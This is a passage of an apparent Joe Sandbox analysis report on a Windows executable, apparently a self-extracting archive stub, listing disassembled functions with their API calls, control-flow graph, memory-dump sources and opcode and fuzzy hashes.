                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: EnvironmentVariable
                  • String ID: sfxcmd$sfxpar
                  • API String ID: 1431749950-3493335439
                  • Opcode ID: 1345264ac2fad0c9f4f7941bd6d780623bbff64b0d83ec59203c9d408f8f24e0
                  • Instruction ID: 10f6932343d9a1b5e42a35cd2472b43dce63a8821fea8052fade9f60129f27f1
                  • Opcode Fuzzy Hash: 1345264ac2fad0c9f4f7941bd6d780623bbff64b0d83ec59203c9d408f8f24e0
                  • Instruction Fuzzy Hash: 5EF0A77380123CA6DB206FD4AC19BFA7B68BF09B41B004561FD8456181D674CD51D7F1

                  Control-flow Graph
                  • Nodes: 1025 9f984e-9f985a; 1026 9f985c-9f9864 GetStdHandle; 1027 9f9867-9f987e ReadFile; 1028 9f98da; 1029 9f9880-9f9889 call 9f9989; 1030 9f98dd-9f98e2; 1033 9f988b-9f9893; 1034 9f98a2-9f98a6; 1037 9f9895; 1035 9f98a8-9f98b1 GetLastError; 1036 9f98b7-9f98bb; 1038 9f98b3-9f98b5; 1039 9f98bd-9f98c5; 1040 9f98d5-9f98d8; 1041 9f9896-9f98a0 call 9f984e; 1042 9f98c7-9f98d0 GetLastError; 1044 9f98d2-9f98d3
                  • Edges: 1025->1026, 1025->1027, 1026->1027, 1027->1028, 1027->1029, 1028->1030, 1029->1033, 1029->1034, 1033->1034, 1033->1037, 1034->1035, 1034->1036, 1035->1036, 1035->1038, 1036->1039, 1036->1040, 1037->1041, 1038->1030, 1039->1040, 1039->1042, 1040->1030, 1041->1030, 1042->1040, 1042->1044, 1044->1041
                  APIs
                  • GetStdHandle.KERNEL32(000000F6), ref: 009F985E
                  • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 009F9876
                  • GetLastError.KERNEL32 ref: 009F98A8
                  • GetLastError.KERNEL32 ref: 009F98C7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorLast$FileHandleRead
                  • String ID:
                  • API String ID: 2244327787-0
                  • Opcode ID: 24819270e28ce458c59b7642cf3e5b2a435a11ac5ba379e083c49a22cf7d7274
                  • Instruction ID: 9f841133d9c3cba1c0d2de43e2ac4340f142569787dd47a49e7291866a0f5d5f
                  • Opcode Fuzzy Hash: 24819270e28ce458c59b7642cf3e5b2a435a11ac5ba379e083c49a22cf7d7274
                  • Instruction Fuzzy Hash: 0811AC3190420CFFDF209B55C804BB937ACEB437B1F10852AFA2A85590D7399E419F61
                  APIs
                  • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00A13713,00000000,00000000,?,00A1A49B,00A13713,00000000,00000000,00000000,?,00A1A698,00000006,FlsSetValue), ref: 00A1A526
                  • GetLastError.KERNEL32(?,00A1A49B,00A13713,00000000,00000000,00000000,?,00A1A698,00000006,FlsSetValue,00A27348,00A27350,00000000,00000364,?,00A19077), ref: 00A1A532
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A1A49B,00A13713,00000000,00000000,00000000,?,00A1A698,00000006,FlsSetValue,00A27348,00A27350,00000000), ref: 00A1A540
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  • Opcode ID: 232e799f9fe388b33f9877767966c639f0dd59436dc9811834f8cedbe9251a34
                  • Instruction ID: 4855897db5f31e3110bcd5ca9cae25ab54d78194cf3b3db725e48d30e8599570
                  • Opcode Fuzzy Hash: 232e799f9fe388b33f9877767966c639f0dd59436dc9811834f8cedbe9251a34
                  • Instruction Fuzzy Hash: 5501FC3265B222ABCB31CBAC9C44AB67769AF567B1B140630F90AD3140D735D942C6E1
                  APIs
                  • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,009FCC94,00000001,?,?,?,00000000,00A04ECD,?,?,?), ref: 009F9F4C
                  • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00A04ECD,?,?,?,?,?,00A04972,?), ref: 009F9F8E
                  • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,009FCC94,00000001,?,?), ref: 009F9FB8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: FileWrite$Handle
                  • String ID:
                  • API String ID: 4209713984-0
                  • Opcode ID: 4d157aa1c86dddee92cf13f7e1c07ce3370aa7329c1acaf7d6600e22452bc0da
                  • Instruction ID: 39dbd059efa21db22d3d51cd9d1a2220d18b6e4b2bae783b72f4bcceed2cd501
                  • Opcode Fuzzy Hash: 4d157aa1c86dddee92cf13f7e1c07ce3370aa7329c1acaf7d6600e22452bc0da
                  • Instruction Fuzzy Hash: B631E5712083099BDF208F14D948B7ABBA8EF91710F04455DFA49DB181CB75DD49CBB2
                  APIs
                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,009FA113,?,00000001,00000000,?,?), ref: 009FA22E
                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,009FA113,?,00000001,00000000,?,?), ref: 009FA261
                  • GetLastError.KERNEL32(?,?,?,?,009FA113,?,00000001,00000000,?,?), ref: 009FA27E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CreateDirectory$ErrorLast
                  • String ID:
                  • API String ID: 2485089472-0
                  • Opcode ID: 0cb3972936d504490bb83a7302283680b103c0736f85a7b9952a665a7997e839
                  • Instruction ID: e1a1f4c0cee522cfde6a2ec02b920ee314b572ecaac5de72a82c912353c2136e
                  • Opcode Fuzzy Hash: 0cb3972936d504490bb83a7302283680b103c0736f85a7b9952a665a7997e839
                  • Instruction Fuzzy Hash: BD01C0B134421C66DF329BA98C05BFE334CAF0A751F044811FB69D5091C76A8A42D7B3
                  APIs
                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00A1B019
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Info
                  • String ID:
                  • API String ID: 1807457897-3916222277
                  • Opcode ID: 811e74b5a53ca6291a50aa2b141a5bb8c5bba2380f4a927c7c419726961de7a7
                  • Instruction ID: 9a8f637233bfd32bce971114d3b928345c457cc93b3160475772761cfc9aadb9
                  • Opcode Fuzzy Hash: 811e74b5a53ca6291a50aa2b141a5bb8c5bba2380f4a927c7c419726961de7a7
                  • Instruction Fuzzy Hash: AA4106B050438CAADF218B64CC94AF7BBB9DB59304F1405EDE59A87142D3359A85DF70
                  APIs
                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00A1A79D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: String
                  • String ID: LCMapStringEx
                  • API String ID: 2568140703-3893581201
                  • Opcode ID: e1887eac7b74d36835d128f634bcfcbdd7b6b504558d90f4c7a94418ca698ff6
                  • Instruction ID: 5fd97817aca9a88365811dd6b1df7f9e28224f71a5263b7694b29aecf0320c9a
                  • Opcode Fuzzy Hash: e1887eac7b74d36835d128f634bcfcbdd7b6b504558d90f4c7a94418ca698ff6
                  • Instruction Fuzzy Hash: A401253254121CBBCF129FA4ED01DEE3F66FF18720F044524FE1465160CA768A72EB91
                  APIs
                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00A19D2F), ref: 00A1A715
                  Strings
                  • InitializeCriticalSectionEx, xrefs: 00A1A6E5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CountCriticalInitializeSectionSpin
                  • String ID: InitializeCriticalSectionEx
                  • API String ID: 2593887523-3084827643
                  • Opcode ID: b447ee1fa2c9c37246d1d82bd5e83c3589b6f9d8e911d7ab1523ce4e56bc9dfe
                  • Instruction ID: 353cc6569f6d6066c2ecf8cfb876cc44b882a6bb52e13054e20a1973a579e1da
                  • Opcode Fuzzy Hash: b447ee1fa2c9c37246d1d82bd5e83c3589b6f9d8e911d7ab1523ce4e56bc9dfe
                  • Instruction Fuzzy Hash: EBF0B43164621CBBCF11AF68DC05CAE7F61FF15720B004564FC055A260DA718A52AB91
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Alloc
                  • String ID: FlsAlloc
                  • API String ID: 2773662609-671089009
                  • Opcode ID: dc190250222a117d191aea8a0e8812bb7faa0f9f1c07c7a582cccd75e8acc474
                  • Instruction ID: 791ab075a7d9c79b2bb24f375de0b7837e64692dcefb6deeb6a9adac351956e9
                  • Opcode Fuzzy Hash: dc190250222a117d191aea8a0e8812bb7faa0f9f1c07c7a582cccd75e8acc474
                  • Instruction Fuzzy Hash: A5E05C71B4622C7BD620EBA8AC068FDBB51EB35720B000134FC0417240CD744F02A6D5
                  APIs
                  • try_get_function.LIBVCRUNTIME ref: 00A132AF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: try_get_function
                  • String ID: FlsAlloc
                  • API String ID: 2742660187-671089009
                  • Opcode ID: c3c0d7a6a7aa1c3bdb3e0cd4e14f8c7f2666bfd729e826c31a224d3f9981cceb
                  • Instruction ID: 036abe21cf55abf04667d75378101891116d5f968c7005faa4671c23e1aa7d28
                  • Opcode Fuzzy Hash: c3c0d7a6a7aa1c3bdb3e0cd4e14f8c7f2666bfd729e826c31a224d3f9981cceb
                  • Instruction Fuzzy Hash: 40D02B33B816387ADD1437E87C079FE7E05A701FF5F490A72FE081A1828671855101C5
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0E20B
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID: 3To
                  • API String ID: 1269201914-245939750
                  • Opcode ID: 524d933d6338e60f928868c1dc47c3c0f6ba4f79b20180c2d8cb477fbda7d2ab
                  • Instruction ID: e56762ac82bf60c50d19f41e518bec3d0f76c5b65d69d306bf7fd36b19ee6bab
                  • Opcode Fuzzy Hash: 524d933d6338e60f928868c1dc47c3c0f6ba4f79b20180c2d8cb477fbda7d2ab
                  • Instruction Fuzzy Hash: 98B012A267F006BD720C91447F06D7A032CD8C0B51330CC2ABA05D40C1A5804D095432
                  APIs
                    • Part of subcall function 00A1AF1B: GetOEMCP.KERNEL32(00000000,?,?,00A1B1A5,?), ref: 00A1AF46
                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A1B1EA,?,00000000), ref: 00A1B3C4
                  • GetCPInfo.KERNEL32(00000000,00A1B1EA,?,?,?,00A1B1EA,?,00000000), ref: 00A1B3D7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CodeInfoPageValid
                  • String ID:
                  • API String ID: 546120528-0
                  • Opcode ID: b6ac24cdef4d466a12c3b2c47a3486fc2dbe453a2ebce8712c31d4123bdf31e3
                  • Instruction ID: aaf4485f1f33e10a683ad1f81aa4e4fdec1069647c7eadd349ba64d465052dd8
                  • Opcode Fuzzy Hash: b6ac24cdef4d466a12c3b2c47a3486fc2dbe453a2ebce8712c31d4123bdf31e3
                  • Instruction Fuzzy Hash: 2A5145B09102159FDB24CF75C8806FABBF5EF51310F18846ED0968B293D73999C6CBA1
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F1385
                    • Part of subcall function 009F6057: __EH_prolog.LIBCMT ref: 009F605C
                    • Part of subcall function 009FC827: __EH_prolog.LIBCMT ref: 009FC82C
                    • Part of subcall function 009FC827: new.LIBCMT ref: 009FC86F
                    • Part of subcall function 009FC827: new.LIBCMT ref: 009FC893
                  • new.LIBCMT ref: 009F13FE
                    • Part of subcall function 009FB07D: __EH_prolog.LIBCMT ref: 009FB082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: cd27f02053ace54d717ce364237b0c20ef1e0c968fe4a16132b10f8bcd0dd26e
                  • Instruction ID: 52badc9299c8bf9ff65b018fed0c26ddd524d93ff1a0ec7d26e8ae419b185db8
                  • Opcode Fuzzy Hash: cd27f02053ace54d717ce364237b0c20ef1e0c968fe4a16132b10f8bcd0dd26e
                  • Instruction Fuzzy Hash: 654135B0805B44DEE728DF798485AE7FBE5FB18310F504A2ED2EE93282CB326554CB51
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F1385
                    • Part of subcall function 009F6057: __EH_prolog.LIBCMT ref: 009F605C
                    • Part of subcall function 009FC827: __EH_prolog.LIBCMT ref: 009FC82C
                    • Part of subcall function 009FC827: new.LIBCMT ref: 009FC86F
                    • Part of subcall function 009FC827: new.LIBCMT ref: 009FC893
                  • new.LIBCMT ref: 009F13FE
                    • Part of subcall function 009FB07D: __EH_prolog.LIBCMT ref: 009FB082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 1eb358f7bc2af319b42ff27763e6249dbb9ec2932437c3979814d06eedcead9e
                  • Instruction ID: 01ce6ddba2521078bb65aef3ed61c93a9bf43c8939f39947d3da6a44043c5489
                  • Opcode Fuzzy Hash: 1eb358f7bc2af319b42ff27763e6249dbb9ec2932437c3979814d06eedcead9e
                  • Instruction Fuzzy Hash: 144132B0805B44DEE728DF798485AE7FAE5FB18310F504A2ED2EE93282CB326554CB51
                  APIs
                    • Part of subcall function 00A18FA5: GetLastError.KERNEL32(?,00A30EE8,00A13E14,00A30EE8,?,?,00A13713,00000050,?,00A30EE8,00000200), ref: 00A18FA9
                    • Part of subcall function 00A18FA5: _free.LIBCMT ref: 00A18FDC
                    • Part of subcall function 00A18FA5: SetLastError.KERNEL32(00000000,?,00A30EE8,00000200), ref: 00A1901D
                    • Part of subcall function 00A18FA5: _abort.LIBCMT ref: 00A19023
                    • Part of subcall function 00A1B2AE: _abort.LIBCMT ref: 00A1B2E0
                    • Part of subcall function 00A1B2AE: _free.LIBCMT ref: 00A1B314
                    • Part of subcall function 00A1AF1B: GetOEMCP.KERNEL32(00000000,?,?,00A1B1A5,?), ref: 00A1AF46
                  • _free.LIBCMT ref: 00A1B200
                  • _free.LIBCMT ref: 00A1B236
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _free$ErrorLast_abort
                  • String ID:
                  • API String ID: 2991157371-0
                  • Opcode ID: 75b8a3414821584c4b62e01cbf01b1b24f93f3da29089db8c9033e1ddf60d320
                  • Instruction ID: 4e94496299a3fffc9561efa81dfc525d243e615a9eb9279167ad459134049932
                  • Opcode Fuzzy Hash: 75b8a3414821584c4b62e01cbf01b1b24f93f3da29089db8c9033e1ddf60d320
                  • Instruction Fuzzy Hash: 09310831900208AFDB10EFA9D941BEDB7F1EF45320F254199F8149B2A1EB755DC6CB60
                  APIs
                  • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,009F9EDC,?,?,009F7867), ref: 009F97A6
                  • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,009F9EDC,?,?,009F7867), ref: 009F97DB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 055725760ed1629209be54abfd7251c536946d6288aba555cfd7defd70290a55
                  • Instruction ID: b4ded94742205215f48c51f8d7fac4bbd3a95338721e7ae072eef44c8d351fd2
                  • Opcode Fuzzy Hash: 055725760ed1629209be54abfd7251c536946d6288aba555cfd7defd70290a55
                  • Instruction Fuzzy Hash: 8821E4B111474CAEE730AF68C885BB777ECEB49764F10892DF6E582191C374AC498B61
                  APIs
                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,009F7547,?,?,?,?), ref: 009F9D7C
                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 009F9E2C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
